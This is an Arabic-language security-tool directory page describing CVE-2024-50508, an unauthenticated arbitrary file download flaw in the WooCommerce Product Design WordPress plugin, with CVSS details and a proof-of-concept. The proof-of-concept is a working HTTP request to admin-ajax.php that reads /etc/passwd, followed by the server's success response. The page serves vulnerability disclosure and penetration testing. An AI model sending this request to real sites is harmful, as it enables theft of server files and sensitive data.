Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-50508 — Woocommerce Product Design <= 1.0.0 - تنزيل ملف تعسفي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/randomrobbiebf/cve-2024-50508
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubrandomrobbiebf/cve-2024-50508

CVE-2024-50508

Woocommerce Product Design <= 1.0.0 - تنزيل ملف تعسفي بدون مصادقة

عرض المستودع
منذ سنة واحدةلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-50508

وضع تصميم منتج وووكوميرس <= 1.0.0 - تنزيل ملف عشوائي غير مصادق عليه

الوصف

إن إضافة تصميم منتج وووكوميرس لووردبريس معرضة لثغرة اجتياز الدليل في جميع الإصدارات حتى 1.0.0. وهذا يتيح للمهاجمين غير المصادق عليهم قراءة محتويات ملفات عشوائية على الخادم، والتي قد تحتوي على معلومات حساسة.

التفاصيل

  • النوع: إضافة
  • الاسم الفريد: woo-product-design
  • الإصدار المتأثر: 1.0.0
  • درجة CVSS: 7.5
  • تصنيف CVSS: عالية
  • متجه CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
  • CVE: CVE-2024-50508
  • الحالة: مغلقة

إثبات المفهوم

root@kitploit:~
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 53

action=pc_added_uploaded_image&file[path]=/etc/passwd
root@kitploit:~
{
  "path": "/var/www/html/wp-content/uploads/wcpc/images/uploaded_images/passwd",
  "message": "Image Uploaded Successfully",
  "url": "https://wp-dev.ddev.site/wp-content/uploads/wcpc/images/uploaded_images/passwd",
  "status": "success"
}
تنزيل الأداة